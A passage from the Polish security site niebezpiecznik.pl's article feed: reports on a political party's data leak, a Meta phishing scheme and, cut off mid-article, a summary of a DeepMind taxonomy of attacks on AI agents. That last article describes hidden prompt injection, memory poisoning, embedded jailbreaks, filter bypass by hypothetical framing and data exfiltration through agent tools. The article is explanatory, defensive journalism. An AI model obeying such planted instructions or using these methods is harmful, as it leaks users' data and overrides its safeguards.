<p>Opisywany incydent idealnie wpisuje się w to, co omawialiśmy niedawno w artykule pt. <a href="https://niebezpiecznik.pl/post/to-nie-ai-jest-najwiekszym-zagrozeniem-czyli-raport-opisujacy-incydenty-z-2025-roku/" target="_blank">To nie AI jest największym zagrożeniem</a>. Mimo że w nagłówkach portali królują dziś przerażające hasła o &#8220;śmiercionośnych skutkach korzystania z AI&#8221;, to tu wektorem ataku był błąd pracownika (dlatego <a href="https://niebezpiecznik.pl/bpi" target="_blank">warto ich edukować pod kątem dobrych praktyk cyberbezpieczeństwa</a>) &#8212; zaniedbanie, połączone z trywialnym złośliwym oprogramowaniem i brakiem egzekwowania reguły najmniejszych uprawnień (Least Privilege) oraz detekcji tego typu infekcji i braku kontrolowania &#8220;shadow IT / shadow AI&#8221;. </p>
<p>Narzędzia bazujące na sztucznej inteligencji, z których coraz częściej korzystają firmy działają &#8220;w chmurze&#8221; dokładnie tak, jak <em>nieejajowe</em> konta usługowe. I tak samo jak w przypadku wszystkich innych usług firm trzecich, bezwzględnie wymagają pełnej kontroli, audytu logów i zasady ograniczonego zaufania. Tu odsyłany do <a href="https://sklep.niebezpiecznik.pl/s/soc" target="_blank">naszego cyklu poświęconego budowie SOC</a>, który takie nadużycia pomaga wychwytywać.</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/zhackowali-ich-bo-pracownik-saas-z-ktorego-korzystali-pobral-cheaty-do-gier-czyli-dlaczego-trzeba-uwazac-na-oauth/#comments" rel="replies" thr:count="10" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/zhackowali-ich-bo-pracownik-saas-z-ktorego-korzystali-pobral-cheaty-do-gier-czyli-dlaczego-trzeba-uwazac-na-oauth/feed/atom/" rel="replies" thr:count="10" type="application/atom+xml"/>
			<thr:total>10</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[&#8220;Ssijcie ruskiego k&#8230;&#8221; czyli partia Mentzena zhackowana po raz 3]]></title>
		<link href="https://niebezpiecznik.pl/post/mentzen-zhackowany-nowa-nadzieja-wlamanie/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=27007</id>
		<updated>2026-04-20T08:34:44Z</updated>
		<published>2026-04-20T08:16:54Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="Hacked!"/><category scheme="https://niebezpiecznik.pl" term="niepełnoletnie"/><category scheme="https://niebezpiecznik.pl" term="Nowa Nadzieja"/><category scheme="https://niebezpiecznik.pl" term="Sławomir Mentzen"/><category scheme="https://niebezpiecznik.pl" term="wyciek danych"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/mentzen-zhackowany-nowa-nadzieja-wlamanie/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Po raz trzeci dane członków oraz nieletnich sympatyków partii Mentzena zostały wykradzione i upublicznione w sieci. Tym razem włamywacz opublikował 500 rekordów zawierających: imię i nazwisko PESEL adres zamieszkania numery telefonów Wyciekły też dane osób oznaczonych jako &#8220;nieaktywne&#8221; ponieważ wciąż znajdowały się w bazie danych. Dodatkowo upubliczniona paczka zawiera treści SMS-ów, e-maili i dokumentów. To nie [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/mentzen-zhackowany-nowa-nadzieja-wlamanie/"><![CDATA[<p>Po raz trzeci dane członków oraz nieletnich sympatyków partii Mentzena zostały wykradzione i upublicznione w sieci. Tym razem włamywacz opublikował 500 rekordów zawierających:</p>
<ul>
<li>imię i nazwisko
<li>PESEL
<li>adres zamieszkania
<li>numery telefonów
</ul>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-600x228.jpg" alt="" width="600" height="228" class="aligncenter size-large wp-image-27009" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-600x228.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-350x133.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-768x292.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-1536x585.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik-2048x780.jpg 2048w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p>Wyciekły też dane osób oznaczonych jako &#8220;<strong>nieaktywne</strong>&#8221; ponieważ wciąż znajdowały się w bazie danych. Dodatkowo upubliczniona paczka zawiera treści SMS-ów, e-maili i dokumentów. </p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2-600x542.jpg" alt="" width="600" height="542" class="aligncenter size-large wp-image-27008" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2-600x542.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2-277x250.jpg 277w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2-768x694.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/nowa-nadzieja-mentzen-hacked-niebezpiecznik_2.jpg 1126w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<h3>To nie pierwszy hack partii Mentzena</h3>
<p>Przypomnijmy, że pierwszy z ataków zakończony wyciekiem danych Nowej Nadziei miał miejsce <strong>16 marca 2025</strong>, <a href="https://niebezpiecznik.pl/post/wyciek-danych-nowa-nadzieja-slawomir-mentzen/" target="_blank">a drugi 4 sierpnia 2025</a>. Partia Mentzena do dziś nie odpowiedziała nam na pytania w sprawie ataków. Można też przypuszczać, że niewiele też poczyniono aby lepiej zabezpieczyć dostęp do danych. </p>
<p>Nie zdziwilibyśmy się, gdyby przyszło nam jeszcze w tym roku, po raz czwarty, opisywać kolejny incydent związany z tą partią&#8230;</p>
<p><a name='akt'></a><br />
<strong class='update'>Aktualizacja (20.04.2026 10:33)</strong><br />
Rzecznik prasowy Nowej Nadziei na Twitterze poinformował, że &#8220;sprawa dotyczy starego, nieaktualnego systemu, dotyczy sekcji młodzieżowej w jednym regionie w Polsce (Białystok)&#8221;.</p>
<h3>Jak uchronić się przed takimi atakami?</h3>
<p>Jeśli chcesz zabezpieczyć się przed atakami na swoje serwery i webaplikacje, zapraszamy na nasze bestsellerowe szkolenie, a raczej <a href="https://niebezpiecznik.pl/net" target="_blank">3 dniowe, pełne praktyki warsztaty, które nauczą Cię jak samodzielnie wykonywać testy penetracyjne</a>. Dzięki niemu wykryjesz dziury w swojej infrastrukturze zanim ktoś zrobi to za Ciebie i opublikuje w internecie dane Twoich klientów lub użytkowników &#8212; oto najbliższe terminy:</p>
<div class="info">
<div><p><b style="color:#f00">Kraków</b>: <strong>13-15 maja 2026</strong>r. — <b style="color:#f00">UWAGA</b>: zostały <strong> tylko 3 wolne miejsca</strong><br />
                        Ostatnio ktoś zarejestrował się 10 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20gfc">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 5 maja)<br>
                        4444 PLN netto (od 6 maja)
                        </ul></div><div><p><b style="color:#f00">Wrocław</b>: <strong>17-19 czerwca 2026</strong>r. — zostało <strong>6 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 18 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20gog">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 8 maja)<br>
                        4444 PLN netto (od 9 maja)
                        </ul></div><div><p><b style="color:#f00">Warszawa</b>: <strong>01-03 lipca 2026</strong>r. — zostało <strong>7 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 26 kwietnia 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20fty">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 8 maja)<br>
                        4444 PLN netto (od 9 maja)
                        </ul></div><div><p><b style="color:#f00"><span style="color:#FF00FF">ZDALNIE</span></b>: <strong>26-28 sierpnia 2026</strong>r. — zostało <strong>9 wolnych miejsc</strong><br />
                        Ostatnio ktoś zarejestrował się 30 marca 2026r. → <a href="https://niebezpiecznik.pl/szkolenia/rejestracja/?sz=1h20g0n">zarejestruj się na to szkolenie</a></p>
                        
                        <ul>
                        3944 PLN netto (do 15 maja)<br>
                        4444 PLN netto (od 16 maja)
                        </ul></div>
</div>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/mentzen-zhackowany-nowa-nadzieja-wlamanie/#comments" rel="replies" thr:count="13" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/mentzen-zhackowany-nowa-nadzieja-wlamanie/feed/atom/" rel="replies" thr:count="13" type="application/atom+xml"/>
			<thr:total>13</thr:total>
			</entry>
		<entry>
		<author>
			<name>redakcja</name>
					</author>

		<title type="html"><![CDATA[Naprawdę dobrze dopracowany atak na właścicieli stron na Facebooku]]></title>
		<link href="https://niebezpiecznik.pl/post/naprawde-dobrze-dopracowany-atak-na-wlascicieli-stron-na-facebooku/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26997</id>
		<updated>2026-04-17T09:32:58Z</updated>
		<published>2026-04-17T09:29:42Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="Facebook"/><category scheme="https://niebezpiecznik.pl" term="Meta"/><category scheme="https://niebezpiecznik.pl" term="phishing"/><category scheme="https://niebezpiecznik.pl" term="socjotechnika"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/naprawde-dobrze-dopracowany-atak-na-wlascicieli-stron-na-facebooku/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam1-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Dziś na naszą redakcyjną skrzynkę spłynął ciekawy i &#8212; podkreślmy &#8212; prawdziwy e-mail od Mety, właściciela Facebooka: Wczujcie się w administratora jakiegoś fanpage. E-mail dotyczy blokady strony w ciągu 24 godzin. E-mail jest wysłany z prawdziwego adresu i nie wpada do spamu. E-mail trafia na adres przypisany do danego fanpage (atakujący nie zna tego adresu, wiadomość wysyła Facebook [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/naprawde-dobrze-dopracowany-atak-na-wlascicieli-stron-na-facebooku/"><![CDATA[<p>Dziś na naszą redakcyjną skrzynkę spłynął ciekawy i &#8212; podkreślmy &#8212; prawdziwy e-mail od Mety, właściciela Facebooka: </p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam1.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam1-527x600.jpg" alt="" width="527" height="600" class="aligncenter size-large wp-image-26998" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam1-527x600.jpg 527w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam1-219x250.jpg 219w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam1-768x875.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam1-1348x1536.jpg 1348w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam1.jpg 1378w" sizes="auto, (max-width: 527px) 100vw, 527px" /></a></p>
<p>Wczujcie się w administratora jakiegoś fanpage. E-mail dotyczy blokady strony w ciągu 24 godzin. E-mail jest wysłany z prawdziwego adresu i nie wpada do spamu. E-mail trafia na adres przypisany do danego fanpage (atakujący nie zna tego adresu, wiadomość wysyła Facebook na niepubliczny e-mail podany przez administratora strony). Ten atak jest &#8212; przynajmniej na tym etapie bardzo wiarygodny.</p>
<p>Ale to jest przekręt. </p>
<p>Atakujący sprytnie wykorzystuje to, że Facebook rzeczywiście wysyła takie maile w momencie prośby o dostęp do czyjegoś Business Portfolio. Co więcej, umożliwia wplecenie w nie fragmentów tekstu kontrolowanego przez atakującego, i jak widać powyżej, nie oznacza wyraźnie, które z fragmentów są dodane przez wnioskującego o dostęp. </p>
<p>Czy jesteście w stanie ustalić samodzielnie, które fragmenty e-maila to treść podstawiona przez atakującego? </p>
<h3>Co się stanie, jeśli ktoś kliknie w link?</h3>
<p>Kliknięcie w pierwszy z linków spowoduje przeniesienie ofiary na stronę wyglądem przypominającą serwisy Mety i zawierającą formularz, który wyłudza dane osobowe oraz login i hasło. </p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam2.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam2-600x420.jpg" alt="" width="600" height="420" class="aligncenter size-large wp-image-27002" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam2-600x420.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam2-350x245.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam2-768x538.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam2.jpg 1486w" sizes="auto, (max-width: 600px) 100vw, 600px" /></a></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam3.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam3-316x250.jpg" alt="" width="316" height="250" class="aligncenter size-medium wp-image-27001" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam3-316x250.jpg 316w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam3-600x475.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam3-768x608.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam3.jpg 1162w" sizes="auto, (max-width: 316px) 100vw, 316px" /></a></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam4.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam4-304x250.jpg" alt="" width="304" height="250" class="aligncenter size-medium wp-image-27000" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam4-304x250.jpg 304w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam4-600x493.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam4-768x631.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam4.jpg 1122w" sizes="auto, (max-width: 304px) 100vw, 304px" /></a></p>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam5.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam5-305x250.jpg" alt="" width="305" height="250" class="aligncenter size-medium wp-image-26999" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam5-305x250.jpg 305w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam5-600x491.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam5-768x629.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/fb-business-scam5.jpg 1124w" sizes="auto, (max-width: 305px) 100vw, 305px" /></a></p>
<p>Jeśli ktoś uzupełni te dane, bo uwierzy w treść autentycznego (!) e-maila od Facebooka, to straci swoje konto.</p>
<p>Na koniec dodajmy, że domena używana do tego ataku zostałą założona dziś i jest schowana za Cloudflare: </p>
<p><code>Domain Name: INFORMATION-CENTER-ONLINE.HELP (188.114.96.11, 188.114.97.11)<br />
Creation Date: 2026-04-17T04:45:53.0Z<br />
Name Server: ALEENA.NS.CLOUDFLARE.COM<br />
Name Server: VICKY.NS.CLOUDFLARE.COM</code></p>
<h3>Co robić, jak żyć?</h3>
<p>Ostrzeżcie przed tymi e-mailami swoich kolegów i koleżanki z firmowych zespołów social media i wszystkich znajomych, którzy prowadzą fanpages na Facebooku. Wyślijcie im linka do tego posta &#8212; no i <a href="https://facebook.com/niebezpiecznik" target="_blank">do naszego Facebooka też</a> :) A jeśli chcecie przeszkolić swoich pracowników z cyberbezpieczeństwa, aby takie &#8212; i jeszcze bardziej zaawansowane ataki wykrywali sami &#8212; to <a href="https://niebezpiecznik.pl/post/zapros-niebezpiecznika-do-swojej-firmy/" target="_blank">rzućcie okiem na tematy naszych cyberwykładów</a> z którymi możemy przyjechać do Waszej firmy albo na Wasz wyjazd integracyjny :)</p>
]]></content>
		
					<link href="https://niebezpiecznik.pl/post/naprawde-dobrze-dopracowany-atak-na-wlascicieli-stron-na-facebooku/#comments" rel="replies" thr:count="19" type="text/html"/>
			<link href="https://niebezpiecznik.pl/post/naprawde-dobrze-dopracowany-atak-na-wlascicieli-stron-na-facebooku/feed/atom/" rel="replies" thr:count="19" type="application/atom+xml"/>
			<thr:total>19</thr:total>
			</entry>
		<entry>
		<author>
			<name>Marcin Maj</name>
							<uri>https://niebezpiecznik.pl</uri>
						</author>

		<title type="html"><![CDATA[Jak można wykiwać Twoje agenty AI oraz boty AI kradnące treści z Twojej strony?]]></title>
		<link href="https://niebezpiecznik.pl/post/ataki-na-agenty-ai-boty-ai-scrapery-ai/" rel="alternate" type="text/html"/>

		<id>https://niebezpiecznik.pl/?p=26986</id>
		<updated>2026-04-07T09:45:28Z</updated>
		<published>2026-04-07T09:43:18Z</published>
		<category scheme="https://niebezpiecznik.pl" term="*GLOWNA"/><category scheme="https://niebezpiecznik.pl" term="AI"/><category scheme="https://niebezpiecznik.pl" term="badania"/><category scheme="https://niebezpiecznik.pl" term="Content Injection"/><category scheme="https://niebezpiecznik.pl" term="jailbreak"/><category scheme="https://niebezpiecznik.pl" term="prompt injection"/><category scheme="https://niebezpiecznik.pl" term="Semantic Manipulation"/><category scheme="https://niebezpiecznik.pl" term="sztuczna inteligencja"/>
		<summary type="html"><![CDATA[<a href="https://niebezpiecznik.pl/post/ataki-na-agenty-ai-boty-ai-scrapery-ai/"><img align="left" hspace="5" width="100" height="100" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/ai-agent-risks-150x150.jpg" class="alignleft tfe wp-post-image" alt="" decoding="async" loading="lazy" /></a>Wstrzykiwanie wrogich, czyli zapętlonych hiperlinkami miałkich treści, które mają zapchać i ogłupić AI, to tylko jeden ze sposobów oszukiwania agentów AI wchodzących na strony internetowe. Oczywiście treści te nie są widzialne dla zwykłych użytkowników. A jakie są inne sposoby wystrychiwania AI na dudka? I czy mogą one wpływać tylko na konkretne agenty? Próbę stworzenia klasyfikacji [&#8230;]]]></summary>

					<content type="html" xml:base="https://niebezpiecznik.pl/post/ataki-na-agenty-ai-boty-ai-scrapery-ai/"><![CDATA[<p>Wstrzykiwanie wrogich, czyli zapętlonych hiperlinkami miałkich treści, które mają zapchać i ogłupić AI, to tylko jeden ze sposobów oszukiwania agentów AI wchodzących na strony internetowe. Oczywiście treści te nie są widzialne dla zwykłych użytkowników. A jakie są inne sposoby wystrychiwania AI na dudka? I czy mogą one wpływać tylko na konkretne agenty? Próbę stworzenia klasyfikacji &#8220;pułapek na AI&#8221; podjęli badacze z Google DeepMind.<span id="more-26986"></span></p>
<h3>&#8220;Ić stont bocie!&#8221;</h3>
<p>Nie od dziś wiadomo, że <a href="https://niebezpiecznik.pl/post/twoj-agent-ai-moze-ukrasc-dane-lub-nabrac-sie-na-phishing-i-co-teraz/">agenty AI da się zmanipulować</a>. Można ukrywać niebezpieczne polecenia dla AI w instrukcjach formatowania Markdown albo LaTeX (tzw. (indirect) prompt injection). Można też zatruwać wiedzę w systemach RAG albo tworzyć tzw. pułapki przeciążeniowe. Co jakiś czas trafiamy na publikacje dotyczące takich rzeczy i czasami mają one charakter zaledwie ciekawostki i o takich piszemy tylko <a href="https://x.com/niebezpiecznik" target="_blank">na naszym Twitterze</a> &#8212; w ogóle to tam publikujemy najwięcej i najczęściej, umieszczamy tam treści, których nie znajdziecie na żadnym innym naszym kanale w social mediach &#8212; więc <a href="https://x.com/niebezpiecznik" target="_blank">dodajcie nas do obserwowanych na Twitterze</a>). Ale innym razem obserwacje z tego tematu dotykają naprawdę poważnych zagrożeń. </p>
<p>Piątka badaczy z Google DeepMind podjęła próbę stworzenia klasyfikacji <a href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=6372438">Pułapek na Agenty AI (AI Agent Traps)</a>. Klasyfikacja bazuje na funkcjach agentów AI, w które wymierzone są ataki. Sami badacze podkreślają, że klasyfikacja doskonała nie jest, gdyż prawdziwe ataki mogą wykorzystywać wiele mechanizmów jednocześnie. Badacze zaproponowali podział pułapek na <strong>6 kategorii</strong>, które opisujemy poniżej.</p>
<div class="info">
<h3>Co każdy pracownik powinien wiedzieć o AI?</h3>
<ul>
<li>Czy korzystanie z AI w firmie stanowi <strong>zagrożenie</strong>? </li>
<li>Czy pracownicy powinni obawiać się ataków &#8220;<strong>deepfejkiem na prezesa</strong>&#8220;? </li>
<li>Czy księgowa powinna <strong>dovibecodować</strong> sobie brakujące funkcje do Excela? </li>
<li>Do jakich służbowych zadań <strong>nigdy nie wolno użyć AI</strong>, a jakie wręcz należy AI powierzyć?</li>
</ul>
<p><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/AI_lecture.jpg"><img loading="lazy" decoding="async" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/AI_lecture-321x250.jpg" alt="" width="321" height="250" class="aligncenter size-medium wp-image-26992" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/AI_lecture-321x250.jpg 321w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/AI_lecture-600x467.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/AI_lecture-768x598.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/AI_lecture.jpg 786w" sizes="auto, (max-width: 321px) 100vw, 321px" /></a></p>
<p>Dokładnie o tym od 2 lat opowiadamy podczas <a href="https://niebezpiecznik.pl/post/zapros-niebezpiecznika-do-swojej-firmy/" target="_blank">wykładów realizowanych dla polskich i zagranicznych spółek</a>. Konkretnie, <strong>merytorycznie</strong> i bez hajpu, ale z humorem i <strong>przykładami konkretnych narzędzi i zastosowań AI</strong> &#8212; tych dobrych i tych złych. Jeśli chcesz zaktualizować wiedzę swoich (współ)pracowników w temacie AI (zarówno ryzyk, zagrożeń jak i korzyści oraz benefitów), to zaproś nas do swojej firmy. W godzinę otworzymy Wam oczy i gwarantujemy, że niektórzy uczestnicy wykłady nie będą chcieli ich zamknąć ich przez najbliższe tygodnie (lub do wyczerpania przysługujących im tokenów/limitów na AI, cokolwiek nastąpi wcześniej :). Aby otrzymać agendę wykładu, napisz na <a href="mailto:szkolenia.ai@niebezpiecznik.pl" target="_blank">szkolenia.ai@niebezpiecznik.pl</a> lub zadzwoń <strong>12-44-202-44</strong>.</div>
<h3>Content Injection Traps (wstrzykiwanie treści)</h3>
<p>W rozumieniu badaczy jest to „atak na percepcję” agentów. Do tej grupy &#8220;pułapek&#8221; zaliczamy osadzanie poleceń dla AI np. wewnątrz kodu CSS lub w komentarzach HTML (badacze użyli tu terminu Web-Standard Obfuscation). Również do tej grupy zaliczono wykorzystywanie składni języków formatowania (np. Markdown czy LaTeX-a) w celu przemycenia złośliwych instrukcji (tzw. <strong>Syntactic Masking</strong>). Takie rzeczy są zazwyczaj niewidoczne dla ludzi, ale mogą być parsowane i przetwarzane przez agenty AI.</p>
<div id="attachment_26993" style="width: 360px" class="wp-caption aligncenter"><a href="https://niebezpiecznik.pl/wp-content/uploads/2026/04/ai-injection-2025.jpg"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-26993" src="https://niebezpiecznik.pl/wp-content/uploads/2026/04/ai-injection-2025-350x146.jpg" alt="" width="350" height="146" class="size-medium wp-image-26993" srcset="https://niebezpiecznik.pl/wp-content/uploads/2026/04/ai-injection-2025-350x146.jpg 350w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/ai-injection-2025-600x250.jpg 600w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/ai-injection-2025-768x320.jpg 768w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/ai-injection-2025-1536x641.jpg 1536w, https://niebezpiecznik.pl/wp-content/uploads/2026/04/ai-injection-2025.jpg 1572w" sizes="auto, (max-width: 350px) 100vw, 350px" /></a><p id="caption-attachment-26993" class="wp-caption-text">Jeden ze starszych, ale dobrze wizualizujących tę technikę przykładów.</p></div>
<p>Do ataków na percepcję zaliczono też użycie steganografii w celu ukrycia złośliwego komunikatu oraz tzw. <strong>Dynamic Cloaking</strong>, czyli wykrywanie, że odwiedzającym jest agent AI i warunkowe wstrzykiwanie szkodliwych treści, których zwykli użytkownicy nie zobaczą.</p>
<h3>Semantic Manipulation Traps (manipulacje semantyczne)</h3>
<p>To ataki, które są wycelowane w &#8220;rozumowanie&#8221; agenta. Chodzi o manipulowanie informacjami syntetyzowanymi przez agenty w celu skłonienia ich do sformułowania wniosków zgodnych z celami napastnika. Do tej grupy &#8220;pułapek&#8221; zaliczamy m.in. wypełnianie tekstu źródłowego starannie dobranym, w określony sposób nacechowanym emocjonalnie albo stronniczym językiem. Wówczas u modeli LLM pojawiają się błędy poznawcze podobne do ludzkich. Inne pułapki z tej kategorii obejmują opakowywanie złośliwych instrukcji w ramy edukacyjne lub hipotetyczne w celu ominięcia filtrów (np. &#8220;powiedz mi jak zrobić [TU WSTAW ZAKAZANĄ RZECZ], abym tego nie powtarzał&#8221;).</p>
<h3>Cognitive State Traps (zatruwanie wiedzy/pamięci)</h3>
<p>To ataki, które są wycelowane w &#8220;uczenie się&#8221; i pamięć agenta, czyli m.in. zatruwanie wiedzy (knowledge poisoning) w systemach RAG (Retrieval-Augmented Generation). Zjawisko to wykorzystuje fakt, że systemy RAG ufają dokumentom zewnętrznym bardziej niż własnej wiedzy wyuczonej, więc jeśli napastnik &#8220;zatruje&#8221; bazę danych (np. wewnętrzne repozytorium firmy), <strong>model zacytuje kłamstwo jako źródło prawdy</strong>. W praktyce osoby o złych intencjach mogą dokonać wstrzyknięcia danych do źródeł AI poprzez publikowanie wrogich treści w publicznych zasobach internetowych (np. Reddit), które są celem robotów indeksujących (<i data-path-to-node="1" data-index-in-node="169">scrapers</i>), lub poprzez przesyłanie &#8220;zatrutych&#8221; plików do współdzielonych repozytoriów korporacyjnych, które agent automatycznie indeksuje.</p>
<p>Do tej samej grupy pułapek badacze zaliczyli <strong>Latent Memory Poisoning</strong>, czyli <a href="https://niebezpiecznik.pl/post/wstrzykneli-backdoor-do-ai/">ataki z uśpionym agentem</a>. Dane wstrzyknięte do pamięci długotrwałej agenta mogą wyglądać normalnie, dopóki nie pojawi się specyficzny wyzwalacz (trigger). Wtedy model &#8220;przypomina sobie&#8221;, że jest zły i zaczyna działać na korzyść atakujących. Kolejny rodzaj ataków w tej grupie to <strong>Contextual Learning Traps</strong>. Chodzi o wykorzystanie zdolności modeli do nauki na przykładach podanych w zapytaniu (few-shot learning). Napastnik podaje kilka przykładów poprawnych interakcji, które są subtelnie skrzywione, a model zaczyna powielać błędy lub stronniczość.</p>
<h3>Behavioural Control Traps</h3>
<p>To ataki, które są wycelowane w działanie agenta, m.in. tzw. osadzone sekwencje jailbreak (<strong>Embedded Jailbreak Sequences</strong>). Samo słowo <i data-path-to-node="1" data-index-in-node="197">Jailbreaking</i> w kontekście LLM odnosi się zazwyczaj do &#8220;wrogich&#8221; danych wejściowych, które mają ominąć mechanizmy dopasowania bezpieczeństwa. Jednak jailbreaking &#8220;osadzony&#8221; polega na ukryciu sekwencji w zasobach zewnętrznych, które agent konsumuje podczas normalnej pracy. Znów jest to więc coś na kształt indirect prompt injection. W momencie pobrania polecenie trafia do okna kontekstowego agenta, skutecznie nadpisując jego mechanizmy bezpieczeństwa w celu wprowadzenia go w stan pozbawiony ograniczeń. Do tej grupy pułapek zaliczymy więc polecenia eksfiltracji osadzone <a href="https://niebezpiecznik.pl/post/twoj-agent-ai-moze-ukrasc-dane-lub-nabrac-sie-na-phishing-i-co-teraz/">w wiadomościach e-mail</a> czy w odpowiedziach API. Ataki te mogą również wykorzystywać zdolność agenta do korzystania z narzędzi, np. agent może wysłać e-mailem dane finansowe, medyczne lub behawioralne do napastnika.</p>
<p>Inne pułapki tego typu to – według badaczy – <strong>Sub-agent Spawning Traps</strong>. Polegają one na wykorzystaniu uprawnień (tzw. orchestratora) do tworzenia podagentów kontrolowanych przez napastnika wewnątrz zaufanego przepływu sterowania.</p>
<h3>Systemic Traps (pułapki na systemy)</h3>
